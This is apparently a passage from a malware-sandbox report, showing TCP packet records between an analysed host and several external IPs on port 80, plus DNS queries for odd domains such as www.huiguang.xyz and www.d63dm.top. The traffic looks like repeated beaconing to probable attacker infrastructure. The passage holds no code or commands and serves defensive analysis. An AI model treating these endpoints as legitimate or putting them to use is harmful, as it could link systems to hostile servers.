                                                                                                        Nov 6, 2024 08:41:49.471136093 CET805001713.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:49.471369028 CET5001780192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:50.291392088 CET5001780192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:50.296705008 CET805001713.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:51.319263935 CET5001880192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:51.324326038 CET805001813.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:51.324554920 CET5001880192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:51.339236021 CET5001880192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:51.344048977 CET805001813.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:52.009560108 CET805001813.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:52.009629011 CET5001880192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:52.838073015 CET5001880192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:52.843250036 CET805001813.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:53.958473921 CET5001980192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:53.965720892 CET805001913.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:53.965810061 CET5001980192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:54.032172918 CET5001980192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:54.038681030 CET805001913.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:54.039218903 CET805001913.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:54.616368055 CET805001913.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:54.616426945 CET5001980192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:55.541165113 CET5001980192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:55.546026945 CET805001913.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:56.561701059 CET5002080192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:56.566658020 CET805002013.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:56.566728115 CET5002080192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:56.580204964 CET5002080192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:56.585143089 CET805002013.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:57.217624903 CET805002013.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:57.262413979 CET805002013.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:57.262564898 CET5002080192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:57.267343044 CET5002080192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:57.272181988 CET805002013.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:42:02.454905033 CET5002180192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:02.459805965 CET8050021217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:02.459888935 CET5002180192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:02.566617966 CET5002180192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:02.571487904 CET8050021217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:03.545226097 CET8050021217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:03.545241117 CET8050021217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:03.545253038 CET8050021217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:03.545264959 CET8050021217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:03.545274973 CET8050021217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:03.545284986 CET8050021217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:03.545295000 CET8050021217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:03.545296907 CET5002180192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:03.545322895 CET5002180192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:03.545351982 CET8050021217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:03.545397997 CET5002180192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:03.545458078 CET8050021217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:03.545552969 CET5002180192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:04.088063002 CET5002180192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:05.125230074 CET5002280192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:05.130270004 CET8050022217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:05.137717962 CET5002280192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:05.145266056 CET5002280192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:05.150476933 CET8050022217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:06.056349993 CET8050022217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:06.056376934 CET8050022217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:06.056394100 CET8050022217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:06.056427002 CET5002280192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:06.056822062 CET8050022217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:06.056834936 CET8050022217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:06.056847095 CET8050022217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:06.056855917 CET8050022217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:06.056889057 CET5002280192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:06.056905031 CET5002280192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:06.195763111 CET8050022217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:06.195893049 CET5002280192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:06.650677919 CET5002280192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:07.669393063 CET5002380192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:07.674659014 CET8050023217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:07.674873114 CET5002380192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:07.686288118 CET5002380192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:07.691418886 CET8050023217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:07.693691969 CET8050023217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:08.558403969 CET8050023217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:08.558455944 CET8050023217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:08.558470011 CET8050023217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:08.558485985 CET8050023217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:08.558521986 CET5002380192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:08.558583021 CET5002380192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:08.558732986 CET8050023217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:08.558748960 CET8050023217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:08.558764935 CET8050023217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:08.558780909 CET8050023217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:08.558788061 CET5002380192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:08.558799982 CET8050023217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:08.558820963 CET5002380192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:08.671194077 CET5002380192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:08.699812889 CET8050023217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:08.699877977 CET5002380192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:09.197529078 CET5002380192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:10.217416048 CET5002480192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:10.222402096 CET8050024217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:10.222476959 CET5002480192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:10.231962919 CET5002480192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:10.237539053 CET8050024217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:11.111923933 CET8050024217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:11.111938000 CET8050024217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:11.111949921 CET8050024217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:11.112126112 CET8050024217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:11.112133026 CET5002480192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:11.112250090 CET5002480192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:11.116682053 CET8050024217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:11.116700888 CET8050024217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:11.116735935 CET8050024217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:11.116897106 CET5002480192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:11.264127970 CET8050024217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:11.264646053 CET5002480192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:11.266280890 CET5002480192.168.2.6217.76.156.252
                                                                                                        Nov 6, 2024 08:42:11.271106005 CET8050024217.76.156.252192.168.2.6
                                                                                                        Nov 6, 2024 08:42:16.344455004 CET5002680192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:16.349463940 CET8050026161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:16.349565983 CET5002680192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:16.362225056 CET5002680192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:16.367065907 CET8050026161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:17.392944098 CET8050026161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:17.392961979 CET8050026161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:17.393054008 CET5002680192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:17.393080950 CET8050026161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:17.393112898 CET8050026161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:17.393294096 CET5002680192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:17.399343967 CET5002680192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:17.869574070 CET5002680192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:18.888391018 CET5002780192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:19.089416027 CET8050027161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:19.091347933 CET5002780192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:19.103229046 CET5002780192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:19.108134985 CET8050027161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:19.923552036 CET8050027161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:19.923798084 CET8050027161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:19.926700115 CET5002780192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:20.044250011 CET8050027161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:20.044312000 CET5002780192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:20.603662968 CET5002780192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:21.623181105 CET5002880192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:21.628225088 CET8050028161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:21.628323078 CET5002880192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:21.640878916 CET5002880192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:21.645723104 CET8050028161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:21.645909071 CET8050028161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:22.488420010 CET8050028161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:22.488435984 CET8050028161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:22.488516092 CET5002880192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:22.616187096 CET8050028161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:22.616241932 CET5002880192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:23.151578903 CET5002880192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:24.170597076 CET5002980192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:24.175683022 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:24.175755978 CET5002980192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:24.184984922 CET5002980192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:24.190838099 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:25.010678053 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:25.010694027 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:25.010711908 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:25.010909081 CET5002980192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:25.130696058 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:25.134015083 CET5002980192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:25.137881041 CET5002980192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:25.143022060 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:30.221756935 CET5003080192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:30.226550102 CET8050030199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:30.226614952 CET5003080192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:30.242670059 CET5003080192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:30.247457981 CET8050030199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:30.853243113 CET8050030199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:30.853271961 CET8050030199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:30.853334904 CET5003080192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:30.853601933 CET8050030199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:30.853643894 CET5003080192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:31.763257980 CET5003080192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:32.778889894 CET5003180192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:32.784781933 CET8050031199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:32.784917116 CET5003180192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:32.796104908 CET5003180192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:32.801122904 CET8050031199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:33.416079998 CET8050031199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:33.416104078 CET8050031199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:33.416564941 CET5003180192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:33.417819023 CET8050031199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:33.419332981 CET5003180192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:34.306804895 CET5003180192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:35.326435089 CET5003280192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:35.331424952 CET8050032199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:35.331511974 CET5003280192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:35.343238115 CET5003280192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:35.348176003 CET8050032199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:35.348186970 CET8050032199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:35.969959021 CET8050032199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:35.969991922 CET8050032199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:35.970041037 CET5003280192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:36.308271885 CET8050032199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:36.308332920 CET5003280192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:36.853719950 CET5003280192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:37.873071909 CET5003380192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:37.878149986 CET8050033199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:37.878288031 CET5003380192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:37.893212080 CET5003380192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:37.899089098 CET8050033199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:38.519113064 CET8050033199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:38.519882917 CET8050033199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:38.519892931 CET8050033199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:38.520024061 CET5003380192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:38.522944927 CET5003380192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:38.522944927 CET5003380192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:38.528259039 CET8050033199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:43.563240051 CET5003480192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:43.568043947 CET8050034188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:43.569310904 CET5003480192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:43.581168890 CET5003480192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:43.586076975 CET8050034188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:44.565088987 CET8050034188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:44.567439079 CET8050034188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:44.567492008 CET5003480192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:45.088124037 CET5003480192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:46.140965939 CET5003580192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:46.145840883 CET8050035188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:46.145996094 CET5003580192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:46.194065094 CET5003580192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:46.198856115 CET8050035188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:47.147092104 CET8050035188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:47.149185896 CET8050035188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:47.149296999 CET5003580192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:47.697390079 CET5003580192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:48.716188908 CET5003680192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:48.721616983 CET8050036188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:48.721704006 CET5003680192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:48.732590914 CET5003680192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:48.737407923 CET8050036188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:48.737508059 CET8050036188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:49.746179104 CET8050036188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:49.749083042 CET8050036188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:49.751292944 CET5003680192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:50.244266033 CET5003680192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:51.267227888 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:51.273732901 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:51.275338888 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:51.283243895 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:51.288582087 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.286896944 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.286912918 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.286927938 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.286940098 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.286948919 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.286959887 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.287024021 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.287066936 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:52.287106991 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:52.287739038 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.287776947 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:52.300640106 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:52.305725098 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:58.021720886 CET5003880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:42:58.026551962 CET80500383.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:42:58.026640892 CET5003880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:42:58.038606882 CET5003880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:42:58.043526888 CET80500383.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:42:58.661890030 CET80500383.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:42:58.661948919 CET5003880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:42:59.543231010 CET5003880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:42:59.746974945 CET80500383.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:43:00.561873913 CET5003980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:43:00.567105055 CET80500393.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:43:00.567220926 CET5003980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:43:00.580977917 CET5003980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:43:00.585810900 CET80500393.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:43:01.193587065 CET80500393.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:43:01.193658113 CET5003980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:43:03.338089943 CET5003980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:43:03.343008995 CET80500393.33.130.190192.168.2.6

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 6, 2024 08:39:41.594624043 CET6547653192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:39:42.490822077 CET53654761.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:39:58.708657026 CET5923353192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:39:58.720695019 CET53592331.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:40:12.157268047 CET6231453192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:40:12.281466961 CET53623141.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:40:25.685594082 CET6335053192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:40:25.729809999 CET53633501.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:40:39.373497009 CET5505653192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:40:39.392317057 CET53550561.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:40:52.907351017 CET5923553192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:40:52.951142073 CET53592351.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:41:06.422233105 CET6431153192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:41:06.742695093 CET53643111.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:41:20.124200106 CET5106653192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:41:20.757752895 CET53510661.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:41:34.577125072 CET5553153192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:41:34.685213089 CET53555311.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:41:48.562402010 CET5522753192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:41:48.763184071 CET53552271.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:42:02.281193972 CET4926353192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:42:02.410065889 CET53492631.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:42:16.280123949 CET6029953192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:42:16.341783047 CET53602991.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:42:30.147758007 CET6358953192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:42:30.217531919 CET53635891.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:42:43.537723064 CET5156953192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:42:43.557391882 CET53515691.1.1.1192.168.2.6
                                                                                                        Nov 6, 2024 08:42:57.310529947 CET6347353192.168.2.61.1.1.1
                                                                                                        Nov 6, 2024 08:42:58.018017054 CET53634731.1.1.1192.168.2.6

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Nov 6, 2024 08:39:41.594624043 CET192.168.2.61.1.1.10x3838Standard query (0)www.huiguang.xyzA (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:39:58.708657026 CET192.168.2.61.1.1.10xbe17Standard query (0)www.beingandbecoming.ltdA (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:40:12.157268047 CET192.168.2.61.1.1.10x9b29Standard query (0)www.futurevision.lifeA (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:40:25.685594082 CET192.168.2.61.1.1.10x4f79Standard query (0)www.schedulemassage.xyzA (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:40:39.373497009 CET192.168.2.61.1.1.10x9f42Standard query (0)www.mcfunding.orgA (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:40:52.907351017 CET192.168.2.61.1.1.10x79ddStandard query (0)www.migorengya8.clickA (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:41:06.422233105 CET192.168.2.61.1.1.10x5068Standard query (0)www.klohk.techA (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:41:20.124200106 CET192.168.2.61.1.1.10x5b7bStandard query (0)www.d63dm.topA (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:41:34.577125072 CET192.168.2.61.1.1.10xdbe6Standard query (0)www.servannto.siteA (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:41:48.562402010 CET192.168.2.61.1.1.10x8f6fStandard query (0)www.telforce.oneA (IP address)IN (0x0001)false
